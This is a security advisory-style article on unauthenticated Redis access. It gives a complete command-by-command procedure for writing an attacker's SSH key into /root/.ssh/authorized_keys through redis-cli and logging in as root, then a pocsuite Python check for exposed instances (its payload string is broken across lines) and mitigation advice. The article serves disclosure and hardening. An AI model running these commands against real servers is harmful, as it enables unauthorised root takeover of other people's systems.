How Unauthenticated Redis Access Lets Attackers Hijack Servers – Exploit Steps and Mitigation

Vulnerability Overview

Redis binds to 0.0.0.0:6379 by default and does not enable authentication. An attacker that can reach the service can connect without credentials, issue any Redis command, read all keys and use Redis’s file‑write capabilities.

Impact

Full disclosure of stored data (keys, values, configuration).

Write arbitrary files on the host filesystem. A common abuse is to write an SSH public key to /root/.ssh/authorized_keys, granting persistent root SSH access.

Execute arbitrary code via the embedded Lua interpreter (e.g., EVAL).

Harvest server metadata (Redis version, memory usage, etc.) with the INFO command.

Exploitation Procedure

Generate an RSA key pair on the attacker machine: ssh-keygen -t rsa -b 2048 -f id_rsa The public key is stored in id_rsa.pub.

Create a payload file that contains the public key followed by two newline characters (required by Redis when writing the file): printf "\n\n$(cat id_rsa.pub)" > foo.txt Upload the payload to the target Redis instance and store it under an arbitrary key (e.g., crackit):

cat foo.txt | redis-cli -h <code>target_ip</code> -x set crackit

Change Redis’s working directory to the SSH directory and set the dump file name to authorized_keys:

redis-cli -h <code>target_ip</code> config set dir /root/.ssh

redis-cli -h <code>target_ip</code> config set dbfilename authorized_keys

Force Redis to write the in‑memory key to disk, which creates /root/.ssh/authorized_keys containing the attacker’s public key: redis-cli -h <code>target_ip</code> save Log in to the compromised host using the private key:

ssh -i id_rsa root@<code>target_ip</code>

Additional Risks

Database leakage – all keys are readable with the KEYS * or SCAN commands.

Remote code execution – the EVAL command can run Lua scripts that invoke system calls.

Information disclosure – the INFO command reveals version, OS, memory usage, and other configuration details useful for further exploitation.

Proof‑of‑Concept (Python, pocsuite)

The following PoC checks whether a Redis service is reachable without authentication by sending the INFO command and looking for the redis_version field.

#!/usr/bin/env python
# -*- coding:utf-8 -*-
import socket, urlparse
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register

class TestPOC(POCBase):
    vulID = '89339'
    version = '1'
    author = ['Anonymous']
    vulDate = '2015-10-26'
    references = ['http://sebug.net/vuldb/ssvid-89339']
    name = 'Redis Unauthorized Access PoC'
    vulType = 'Unauthorized access'

    def _verify(self):
        result = {}
        payload = b'*1
$4
info
'
        s = socket.socket()
        socket.setdefaulttimeout(10)
        host = urlparse.urlparse(self.url).netloc
        port = 6379
        try:
            s.connect((host, port))
            s.send(payload)
            recvdata = s.recv(1024)
            if recvdata and b'redis_version' in recvdata:
                result['VerifyInfo'] = {'URL': self.url, 'Port': port}
        finally:
            s.close()
        return self.parse_attack(result)

    def _attack(self):
        return self._verify()

    def parse_attack(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('No response or not vulnerable')
        return output

register(TestPOC)

Mitigation

Restrict the bind address to trusted interfaces (e.g., 127.0.0.1) and change the default port.

Enable authentication with requirepass. Note that the password is stored in plain text in redis.conf.

Rename or disable dangerous commands, for example: rename-command CONFIG "" # disables CONFIG or rename-command CONFIG "RENAME_CONFIG" Run Redis with a non‑root user whenever possible to limit file‑write impact.

Future Redis releases plan to introduce real ACLs and multiple users with per‑command permissions.